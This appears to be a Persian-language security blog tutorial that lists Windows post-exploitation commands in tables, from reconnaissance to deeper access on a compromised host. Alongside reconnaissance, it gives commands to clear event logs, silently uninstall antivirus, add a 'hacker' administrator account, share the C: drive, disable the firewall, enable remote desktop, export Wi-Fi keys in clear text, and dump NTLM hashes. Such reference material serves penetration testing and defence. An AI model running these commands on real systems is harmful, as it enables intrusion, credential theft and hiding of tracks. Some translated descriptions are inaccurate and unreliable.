امنیتتست نفوذ

دستورات مهم یک هکر برای بهره برداری از ویندوز – Windows Post Exploitation

دستورات مهم یک هکر برای بهره برداری از ویندوز (Windows Post Exploitation)

Exploitation یا بهره برداری یک برنامه یا اسکریپت برنامه ریزی شده است که می تواند هکرها را قادر به کنترل یک سیستم و بهره برداری از آسیب پذیری های آن کند. Windows Post Exploitation تکنیکی برای پیاده سازی اهداف مخرب یک هکر بر روی سیستم عامل ویندوزی قربانی میباشد. هکر با استفاده از این تکنیک میتواند فرایندهای زیر را انجام دهد:

  • شناسایی تارگت ها (Understanding the victim)
  • ارتقا سطح دسترسی (Privilege escalation)
  • پاک کردن ردپا (Cleaning tracks and staying undetected)
  • جمع آوری اطلاعات سیستم (Collecting system information and data)
  • راه اندازی درب پشتی و روت کیت ها (Setting up backdooring and rootkits)
  • دسترسی به زیر شبکه کلاینت ها (Pivoting to penetrate internal)
  • و…

استفاده از این نوع تکنیک به دو صورت انجام میشود که اولی با استفاده از فریم ورک تست نفوذ متاسپلویت است که ماژولی مخصوص این کار دارد و قابل توسعه نیز میباشد. دومی نیز با استفاده از خط فرمان سیستم عامل انجام میگیرد. Post Exploitation در زمینه تست نفوذ (pentesting) و برنامه نویسی بدافزار (malware programing) به کار می رود.

در ادامه به بررسی برخی از دستورات مهم Windows Post Exploitation می پردازیم که در محیط cmd و پاورشل قابل اجرا میباشند. این دستورات به صورت زیر میباشند:

  • Blind Files (مشاهده فایل ها، مسیریابی پوشه ها یا پرونده های اشتراکی از طریق smb,ftp,nfs و..)
  • System (دستورات مرتبط با اطلاعات سیستم)
  • (Networking (ipconfig, netstat, net (دستورات مرتبط با شبکه)
  • Configs (دستورات مرتبط با پیکربندی سیستم عامل)
  • Finding Important Files (دستوراتی برای پیدا کردن اطلاعات حساس از سیستم)
  • Remote System Access ( دستوراتی برای دسترسی به سیستم از راه دور)
  • Deleting Logs (دستوراتی در رابطه با حذف فایل های لاگ)
  • (Uninstalling Software “AntiVirus” (Non interactive (دستوراتی در رابطه با حذف برنامه ها مانند انتی ویروس ها و…)
  • Invasive or Altering Commands (دستوراتی برای ایجاد تغییرات در سیستم عامل)
  • Third Party Portable Tools (ابزارهایی برای بهره برداری بیشتر)

مکان فایل های مهم Blind Files

دستورات توضیحات
tree C:\ /f /a > C:\output_of_tree.txt یک لیست دایرکتوری را در قالب “درخت” چاپ می کند. آرگومان a باعث می شود که درختان با استفاده از نویسه های ASCII به جای موارد خاص چاپ شوند و آرگومان f نام فایل ها و همچنین پوشه ها را نشان می دهد.
dir /a تمام پرونده ها را در یک دایرکتوری فهرست می کند که شامل فایل های پنهان و سیستمی نیز میشود.
dir /b /s [Directory or Filename] شامل فهرست پرونده ها و دایرکتوری ها میباشد.
dir \ /s /b | find /I “searchstring”
command | find /c /v “” شمارش تمام خطوطی که برای “فرمان” استفاده می کنید.

دستورات مرتبط با System

دستورات توضیحات
whoami کاربر فعلی سیستم را نمایش میدهد.
whoami /all کاربر فعلی را به همراه گروه و سطح دسترسی نشان میدهد.
set

متغییر های محیطی را نشان میدهد. مانند:

USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.

fsutil fsinfo drives درایو های فعلی سیستم را نشان میدهد. نیاز به دسترسی ادمین دارد.
reg query HKLM /s /d /f “C:\* *.exe” | find /I “C:\” | find /V “””” کوئری های ایمن ثبت شده در رجیستری سیستم عامل  ویندوز 7 را نشان میدهد.

دستورات مرتبط با (Networking (ipconfig, netstat, net

دستورات توضیحات
ipconfig /all اطلاعات کامل درباره NIC شما را نمایش می دهد.
ipconfig /displaydns کش DNS محلی شما را نمایش می دهد.
netstat -nabo لیست پورت ها / اتصالات با فرآیند متناظر (-b)، انجام ندادن (-n)، تمام اتصالات (-a) و مالکیت شناسه پردازش (-o)
netstat -r جدول مسیریابی را نمایش می دهد.
netstat -na | findstr :445 همه پورت ها و اتصالات مربوط به  پورت 445 را پیدا کنید.
netstat -nao | findstr LISTENING پیدا کردن تمام پورت های LISTENING و PID مربوط به آنها.
netstat -anob | findstr “services, process or port” پرچم “b” فرمان را طولانی تر می کند اما نام پروسه را با استفاده از هر یک از اتصالات نمایش می دهد.
netsh diag show all {XP only} اطلاعات مربوط به سرویس های شبکه و آداپتورها را نشان می دهد
net view پرس و جو های (NBNS / SMB SAMBA) و تلاش برای پیدا کردن همه میزبان در گروه کاری یا دامنه فعلی شما.
net view /domain لیست تمام دامنه های موجود میزبان
net view /domain:otherdomain پرس و جوهای NBNS / SMB) SAMBA) و تلاش برای پیدا کردن همه میزبان در ‘otherdomain’
net user %USERNAME% /domain اطلاعاتی راجع به کاربر فعلی را نشان میدهد که جزو یک کاربر دامنه هستند. اگر شما یک کاربر محلی هستید پس شما فقط دامنه را رها می کنید. مهمترین چیزهایی که باید توجه داشته باشید عبارتند از زمان ورود، آخرین بار تغییر رمز عبور، اسکریپت های ورود به سیستم و عضویت در گروه.
net user /domain همه کاربران دامنه را لیست می کند.
net accounts سیاست رمز عبور برای سیستم محلی را چاپ می کند.
net accounts /domain سیاست رمز عبور برای دامنه را چاپ می کند.
net localgroup administrators اعضای گروه محلی Administrators را چاپ می کند.
net localgroup administrators /domain برای استفاده از گروه و دامنه محلی فرض شده است.
net group “Domain Admins” /domain اعضای گروه مدیران دامنه را چاپ می کند.
net group “Enterprise Admins” /domain اعضای گروه مدیران اداری را چاپ می کند.
net group “Domain Controllers” /domain لیست کنترل کننده ها را برای دامنه فعلی چاپ می کند.
net share smb به اشتراک گذاشته شده شما را نمایش می دهد و مسیر (ها) آنها را نشان می دهد.
net session | find / “\\”
arp -a لیست تمام سیستم های موجود در جدول ARP دستگاه را نشان می دهد.
route print جدول مسیریابی ماشین را چاپ می کند. این می تواند برای پیدا کردن شبکه های دیگر و مسیرهای استاتیک که در آن قرار داده شده است مفید باشد.
browstat (Not working on XP)
netsh wlan show profiles تمام پروفایل های بی سیم ذخیره شده را نشان می دهد. بعدا می توانید اطلاعات مربوط به این پروفایل را با دستور زیر وارد کنید.
netsh wlan export profile folder=. key=clear

یک پروفایل کاربری wifi را با رمز عبور در متن ساده به یک فایل xml در دایرکتوری کاری فعلی صادر می کند.

netsh wlan [start|stop] hostednetwork یک هات اسپات را استارت یا استاپ میکند.
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary تنظیم کامل شبکه میزبان برای ایجاد یک Backdoor بی سیم.
netsh wlan set hostednetwork mode=[allow|disallow]

سرویس شبکه میزبان را فعال یا غیرفعال می کند.

wmic ntdomain list اطلاعات مربوط به دامنه و کنترل کننده دامنه را بازیابی کنید.

دستورات مرتبط با Configs

دستورات توضیحات
gpresult /z خروجی متشکل از GPO) Group policy) و تنظیمات مربوط به سیستم فعلی و کاربر را نشان میدهد.
sc qc <servicename>

تنظیمات سرویس را بررسی می کند.

sc query

به تنهایی مورد استفاده قرار می گیرد و تمام سرویس ها نمایش داده می شوند.

sc queryex اطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد.
type %WINDIR%\System32\drivers\etc\hosts اطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد.
echo %COMSPEC%

معمولا در cmd.exe در دایرکتوری ویندوز قرار می گیرند، اما خوب است که مطمئن شوید.

c:\windows\system32\gathernetworkinfo.vbs ثبت نام رجیستری، پیکربندی فایروال، کش DNS، اسکریپت و غیره را داخل ویندوز۷ نشان میدهد.

دستوراتی برای Remote System Access

دستورات توضیحات
net share \\computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername به شما اجازه می دهد تا به سیستم دوردست به عنوان کاربر فعلی دسترسی پیدا کنید
net use \\computername /user:DOMAIN\username password

با استفاده از IPC $ mount، یک نام کاربری و رمز عبور به شما اجازه می دهد تا به دستورات دسترسی پیدا کنید که معمولا از نام کاربری و رمز عبور به عنوان کاربر دیگری در زمینه سیستم از راه دور درخواست نمی کنند.

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f فعال کردن سرویس دسترسی از راه دور.
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f

 

کمک از راه دور را فعال کنید.

دستوراتی در رابطه با Deleting Logs

  • wevtutil el (list logs)
  • wevtutil cl <LogName> (Clear specific lowbadming)
  • del %WINDIR%\*.log /a /s /q /f

دستوراتی در رابطه با Uninstalling Software

  • wmic product get name /value (this gets software names)
  • wmic product where name=”XXX” call uninstall /nointeractive (this uninstalls software)

دستوراتی برای ایجاد تغییرات در سیستم Invasive or Altering Commands

دستورات

توضیحات
net user hacker hacker /add یک کاربر جدید محلی با نام هکر و پسورد “هکر” ایجاد میکند.
net localgroup administrators /add hacker

or

net localgroup administrators hacker /add

کاربر “هکر” جدید را به گروه مدیران محلی اضافه می کند.
net share nothing$=C:\ /grant:hacker,FULL /unlimited

درایو C (یا هر درایو دیگر) به عنوان سهم ویندوز به اشتراک میگذارد. و حقوق کامل کاربر هکر را برای دسترسی یا تغییر هر چیزی در آن درایو به شما ارائه می دهد.

net user username /active:yes /domain یک حساب کاربری غیر فعال / غیر فعال را فعال می کند.
netsh firewall set opmode disable فایروال ویندوز را غیرفعال می کند.
netsh firewall set opmode enable فایروال ویندوز را فعال می کند.

ابزارهایی برای بهره برداری بیشتر Third Party Portable Tools

دستورات برنامه های مرتبط توضیحات
carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump http://h.ackack.net/carrot-exe.html بازگرداندن تنظیمات متداول فایروال setupnetsh opmode را غیر فعال می کند.
PwDump7.exe > ntlm.txt http://www.tarasco.org/security/pwdump_7/ هش های ویندوز NTLM را پاک می کند.

مطالب مرتبط:

متصل شدن به وایفای با cmd
آموزش به دست آوردن پسورد وایفای با cmd ویندوز
دستورات کامل All CMD Commands – cmd
7 کد مخرب در محیط cmd ویندوز

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا